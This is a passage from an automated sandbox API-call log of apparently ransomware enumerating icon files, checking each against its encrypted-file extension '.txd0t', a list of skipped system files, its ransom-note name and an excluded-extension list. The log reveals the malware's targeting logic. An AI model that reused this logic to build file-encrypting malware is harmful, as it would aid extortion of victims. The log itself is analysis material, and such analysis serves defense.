hFindFile=0xec1cf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate7.ico", cAlternateFileName="")) returned 1 [0117.574] StrCmpW (psz1="Rotate7.ico", psz2=".") returned 1 [0117.574] StrCmpW (psz1="Rotate7.ico", psz2="..") returned 1 [0117.597] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0117.597] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0117.597] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate7.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" [0117.597] PathFindExtensionW (pszPath="Rotate7.ico") returned=".ico" [0117.597] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0117.597] StrCmpIW (psz1="Rotate7.ico", psz2="bootsect.bak") returned 1 [0117.597] StrCmpIW (psz1="Rotate7.ico", psz2="iconcache.db") returned 1 [0117.597] StrCmpIW (psz1="Rotate7.ico", psz2="thumbs.db") returned -1 [0117.597] StrCmpIW (psz1="Rotate7.ico", psz2=" ransomware ") returned 1 [0117.597] StrCmpIW (psz1="Rotate7.ico", psz2=" ransom ") returned 1 [0117.597] StrCmpIW (psz1="Rotate7.ico", psz2="debug.txt") returned 1 [0117.598] StrCmpIW (psz1="Rotate7.ico", psz2="boot.ini") returned 1 [0117.598] StrCmpIW (psz1="Rotate7.ico", psz2="desktop.ini") returned 1 [0117.598] StrCmpIW (psz1="Rotate7.ico", psz2="autorun.inf") returned 1 [0117.598] StrCmpIW (psz1="Rotate7.ico", psz2="ntuser.dat") returned 1 [0117.598] StrCmpIW (psz1="Rotate7.ico", psz2="ntldr") returned 1 [0117.598] StrCmpIW (psz1="Rotate7.ico", psz2="ntdetect.com") returned 1 [0117.598] StrCmpIW (psz1="Rotate7.ico", psz2="bootfont.bin") returned 1 [0117.598] StrCmpIW (psz1="Rotate7.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.598] PathFindExtensionW (pszPath="Rotate7.ico") returned=".ico" [0117.598] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.598] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate8.ico", cAlternateFileName="")) returned 1 [0117.598] StrCmpW (psz1="Rotate8.ico", psz2=".") returned 1 [0117.598] StrCmpW (psz1="Rotate8.ico", psz2="..") returned 1 [0117.598] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0117.598] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0117.598] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate8.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" [0117.598] PathFindExtensionW (pszPath="Rotate8.ico") returned=".ico" [0117.598] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0117.598] StrCmpIW (psz1="Rotate8.ico", psz2="bootsect.bak") returned 1 [0117.598] StrCmpIW (psz1="Rotate8.ico", psz2="iconcache.db") returned 1 [0117.598] StrCmpIW (psz1="Rotate8.ico", psz2="thumbs.db") returned -1 [0117.598] StrCmpIW (psz1="Rotate8.ico", psz2=" ransomware ") returned 1 [0117.598] StrCmpIW (psz1="Rotate8.ico", psz2=" ransom ") returned 1 [0117.598] StrCmpIW (psz1="Rotate8.ico", psz2="debug.txt") returned 1 [0117.598] StrCmpIW (psz1="Rotate8.ico", psz2="boot.ini") returned 1 [0117.598] StrCmpIW (psz1="Rotate8.ico", psz2="desktop.ini") returned 1 [0117.598] StrCmpIW (psz1="Rotate8.ico", psz2="autorun.inf") returned 1 [0117.598] StrCmpIW (psz1="Rotate8.ico", psz2="ntuser.dat") returned 1 [0117.598] StrCmpIW (psz1="Rotate8.ico", psz2="ntldr") returned 1 [0117.598] StrCmpIW (psz1="Rotate8.ico", psz2="ntdetect.com") returned 1 [0117.598] StrCmpIW (psz1="Rotate8.ico", psz2="bootfont.bin") returned 1 [0117.598] StrCmpIW (psz1="Rotate8.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.598] PathFindExtensionW (pszPath="Rotate8.ico") returned=".ico" [0117.598] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.598] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Save.ico", cAlternateFileName="")) returned 1 [0117.599] StrCmpW (psz1="Save.ico", psz2=".") returned 1 [0117.599] StrCmpW (psz1="Save.ico", psz2="..") returned 1 [0117.599] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0117.599] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0117.599] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Save.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Save.ico" [0117.599] PathFindExtensionW (pszPath="Save.ico") returned=".ico" [0117.599] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0117.599] StrCmpIW (psz1="Save.ico", psz2="bootsect.bak") returned 1 [0117.599] StrCmpIW (psz1="Save.ico", psz2="iconcache.db") returned 1 [0117.599] StrCmpIW (psz1="Save.ico", psz2="thumbs.db") returned -1 [0117.599] StrCmpIW (psz1="Save.ico", psz2=" ransomware ") returned 1 [0117.599] StrCmpIW (psz1="Save.ico", psz2=" ransom ") returned 1 [0117.599] StrCmpIW (psz1="Save.ico", psz2="debug.txt") returned 1 [0117.599] StrCmpIW (psz1="Save.ico", psz2="boot.ini") returned 1 [0117.599] StrCmpIW (psz1="Save.ico", psz2="desktop.ini") returned 1 [0117.599] StrCmpIW (psz1="Save.ico", psz2="autorun.inf") returned 1 [0117.599] StrCmpIW (psz1="Save.ico", psz2="ntuser.dat") returned 1 [0117.599] StrCmpIW (psz1="Save.ico", psz2="ntldr") returned 1 [0117.599] StrCmpIW (psz1="Save.ico", psz2="ntdetect.com") returned 1 [0117.599] StrCmpIW (psz1="Save.ico", psz2="bootfont.bin") returned 1 [0117.599] StrCmpIW (psz1="Save.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.599] PathFindExtensionW (pszPath="Save.ico") returned=".ico" [0117.599] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.599] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x8f66, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Setup.ico", cAlternateFileName="")) returned 1 [0117.599] StrCmpW (psz1="Setup.ico", psz2=".") returned 1 [0117.599] StrCmpW (psz1="Setup.ico", psz2="..") returned 1 [0117.599] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0117.599] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0117.599] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Setup.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" [0117.599] PathFindExtensionW (pszPath="Setup.ico") returned=".ico" [0117.599] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0117.599] StrCmpIW (psz1="Setup.ico", psz2="bootsect.bak") returned 1 [0117.599] StrCmpIW (psz1="Setup.ico", psz2="iconcache.db") returned 1 [0117.599] StrCmpIW (psz1="Setup.ico", psz2="thumbs.db") returned -1 [0117.599] StrCmpIW (psz1="Setup.ico", psz2=" ransomware ") returned 1 [0117.600] StrCmpIW (psz1="Setup.ico", psz2=" ransom ") returned 1 [0117.600] StrCmpIW (psz1="Setup.ico", psz2="debug.txt") returned 1 [0117.600] StrCmpIW (psz1="Setup.ico", psz2="boot.ini") returned 1 [0117.600] StrCmpIW (psz1="Setup.ico", psz2="desktop.ini") returned 1 [0117.600] StrCmpIW (psz1="Setup.ico", psz2="autorun.inf") returned 1 [0117.600] StrCmpIW (psz1="Setup.ico", psz2="ntuser.dat") returned 1 [0117.600] StrCmpIW (psz1="Setup.ico", psz2="ntldr") returned 1 [0117.600] StrCmpIW (psz1="Setup.ico", psz2="ntdetect.com") returned 1 [0117.600] StrCmpIW (psz1="Setup.ico", psz2="bootfont.bin") returned 1 [0117.600] StrCmpIW (psz1="Setup.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.600] PathFindExtensionW (pszPath="Setup.ico") returned=".ico" [0117.600] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.600] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b5e7f00, ftCreationTime.dwHighDateTime=0x1ca927c, ftLastAccessTime.dwLowDateTime=0x5b5e7f00, ftLastAccessTime.dwHighDateTime=0x1ca927c, ftLastWriteTime.dwLowDateTime=0x5b5e7f00, ftLastWriteTime.dwHighDateTime=0x1ca927c, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="stop.ico", cAlternateFileName="")) returned 1 [0117.600] StrCmpW (psz1="stop.ico", psz2=".") returned 1 [0117.600] StrCmpW (psz1="stop.ico", psz2="..") returned 1 [0117.600] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0117.600] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0117.600] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="stop.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned="C:\\588bce7c90097ed212\\Graphics\\stop.ico" [0117.600] PathFindExtensionW (pszPath="stop.ico") returned=".ico" [0117.600] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0117.600] StrCmpIW (psz1="stop.ico", psz2="bootsect.bak") returned 1 [0117.600] StrCmpIW (psz1="stop.ico", psz2="iconcache.db") returned 1 [0117.600] StrCmpIW (psz1="stop.ico", psz2="thumbs.db") returned -1 [0117.600] StrCmpIW (psz1="stop.ico", psz2=" ransomware ") returned 1 [0117.600] StrCmpIW (psz1="stop.ico", psz2=" ransom ") returned 1 [0117.600] StrCmpIW (psz1="stop.ico", psz2="debug.txt") returned 1 [0117.600] StrCmpIW (psz1="stop.ico", psz2="boot.ini") returned 1 [0117.600] StrCmpIW (psz1="stop.ico", psz2="desktop.ini") returned 1 [0117.600] StrCmpIW (psz1="stop.ico", psz2="autorun.inf") returned 1 [0117.600] StrCmpIW (psz1="stop.ico", psz2="ntuser.dat") returned 1 [0117.600] StrCmpIW (psz1="stop.ico", psz2="ntldr") returned 1 [0117.600] StrCmpIW (psz1="stop.ico", psz2="ntdetect.com") returned 1 [0117.600] StrCmpIW (psz1="stop.ico", psz2="bootfont.bin") returned 1 [0117.600] StrCmpIW (psz1="stop.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.600] PathFindExtensionW (pszPath="stop.ico") returned=".ico" [0117.600] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.600] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="SysReqMet.ico", cAlternateFileName="SYSREQ~1.ICO")) returned 1 [0117.601] StrCmpW (psz1="SysReqMet.ico", psz2=".") returned 1 [0117.601] StrCmpW (psz1="SysReqMet.ico", psz2="..") returned 1 [0117.601] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0117.601] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0117.601] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="SysReqMet.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" [0117.601] PathFindExtensionW (pszPath="SysReqMet.ico") returned=".ico" [0117.601] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0117.601] StrCmpIW (psz1="SysReqMet.ico", psz2="bootsect.bak") returned 1 [0117.601] StrCmpIW (psz1="SysReqMet.ico", psz2="iconcache.db") returned 1 [0117.601] StrCmpIW (psz1="SysReqMet.ico", psz2="thumbs.db") returned -1 [0117.601] StrCmpIW (psz1="SysReqMet.ico", psz2=" ransomware ") returned 1 [0117.601] StrCmpIW (psz1="SysReqMet.ico", psz2=" ransom ") returned 1 [0117.601] StrCmpIW (psz1="SysReqMet.ico", psz2="debug.txt") returned 1 [0117.601] StrCmpIW (psz1="SysReqMet.ico", psz2="boot.ini") returned 1 [0117.601] StrCmpIW (psz1="SysReqMet.ico", psz2="desktop.ini") returned 1 [0117.601] StrCmpIW (psz1="SysReqMet.ico", psz2="autorun.inf") returned 1 [0117.601] StrCmpIW (psz1="SysReqMet.ico", psz2="ntuser.dat") returned 1 [0117.601] StrCmpIW (psz1="SysReqMet.ico", psz2="ntldr") returned 1 [0117.601] StrCmpIW (psz1="SysReqMet.ico", psz2="ntdetect.com") returned 1 [0117.601] StrCmpIW (psz1="SysReqMet.ico", psz2="bootfont.bin") returned 1 [0117.601] StrCmpIW (psz1="SysReqMet.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.601] PathFindExtensionW (pszPath="SysReqMet.ico") returned=".ico" [0117.601] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.601] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="SysReqNotMet.ico", cAlternateFileName="SYSREQ~2.ICO")) returned 1 [0117.601] StrCmpW (psz1="SysReqNotMet.ico", psz2=".") returned 1 [0117.601] StrCmpW (psz1="SysReqNotMet.ico", psz2="..") returned 1 [0117.601] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0117.601] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0117.601] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="SysReqNotMet.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" [0117.601] PathFindExtensionW (pszPath="SysReqNotMet.ico") returned=".ico" [0117.601] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0117.601] StrCmpIW (psz1="SysReqNotMet.ico", psz2="bootsect.bak") returned 1 [0117.601] StrCmpIW (psz1="SysReqNotMet.ico", psz2="iconcache.db") returned 1 [0117.601] StrCmpIW (psz1="SysReqNotMet.ico", psz2="thumbs.db") returned -1 [0117.601] StrCmpIW (psz1="SysReqNotMet.ico", psz2=" ransomware ") returned 1 [0117.602] StrCmpIW (psz1="SysReqNotMet.ico", psz2=" ransom ") returned 1 [0117.612] StrCmpIW (psz1="SysReqNotMet.ico", psz2="debug.txt") returned 1 [0117.612] StrCmpIW (psz1="SysReqNotMet.ico", psz2="boot.ini") returned 1 [0117.612] StrCmpIW (psz1="SysReqNotMet.ico", psz2="desktop.ini") returned 1 [0117.612] StrCmpIW (psz1="SysReqNotMet.ico", psz2="autorun.inf") returned 1 [0117.612] StrCmpIW (psz1="SysReqNotMet.ico", psz2="ntuser.dat") returned 1 [0117.612] StrCmpIW (psz1="SysReqNotMet.ico", psz2="ntldr") returned 1 [0117.612] StrCmpIW (psz1="SysReqNotMet.ico", psz2="ntdetect.com") returned 1 [0117.612] StrCmpIW (psz1="SysReqNotMet.ico", psz2="bootfont.bin") returned 1 [0117.612] StrCmpIW (psz1="SysReqNotMet.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.612] PathFindExtensionW (pszPath="SysReqNotMet.ico") returned=".ico" [0117.612] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.612] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 1 [0117.612] StrCmpW (psz1="warn.ico", psz2=".") returned 1 [0117.620] StrCmpW (psz1="warn.ico", psz2="..") returned 1 [0117.621] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0117.621] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0117.621] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="warn.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned="C:\\588bce7c90097ed212\\Graphics\\warn.ico" [0117.621] PathFindExtensionW (pszPath="warn.ico") returned=".ico" [0117.621] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0117.621] StrCmpIW (psz1="warn.ico", psz2="bootsect.bak") returned 1 [0117.621] StrCmpIW (psz1="warn.ico", psz2="iconcache.db") returned 1 [0117.621] StrCmpIW (psz1="warn.ico", psz2="thumbs.db") returned 1 [0117.621] StrCmpIW (psz1="warn.ico", psz2=" ransomware ") returned 1 [0117.621] StrCmpIW (psz1="warn.ico", psz2=" ransom ") returned 1 [0117.621] StrCmpIW (psz1="warn.ico", psz2="debug.txt") returned 1 [0117.621] StrCmpIW (psz1="warn.ico", psz2="boot.ini") returned 1 [0117.629] StrCmpIW (psz1="warn.ico", psz2="desktop.ini") returned 1 [0117.629] StrCmpIW (psz1="warn.ico", psz2="autorun.inf") returned 1 [0117.629] StrCmpIW (psz1="warn.ico", psz2="ntuser.dat") returned 1 [0117.637] StrCmpIW (psz1="warn.ico", psz2="ntldr") returned 1 [0117.637] StrCmpIW (psz1="warn.ico", psz2="ntdetect.com") returned 1 [0117.637] StrCmpIW (psz1="warn.ico", psz2="bootfont.bin") returned 1 [0117.637] StrCmpIW (psz1="warn.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.637] PathFindExtensionW (pszPath="warn.ico") returned=".ico" [0117.637] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.637] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 0 [0117.637] FindClose (in: hFindFile=0xec1cf0 | out: hFindFile=0xec1cf0) returned 1 [0117.648] GetProcessHeap () returned 0xe30000 [0117.648] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0117.648] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x590c0819, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x102c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="header.bmp.txd0t", cAlternateFileName="HEADER~1.TXD")) returned 1 [0117.648] StrCmpW (psz1="header.bmp.txd0t", psz2=".") returned 1 [0117.648] StrCmpW 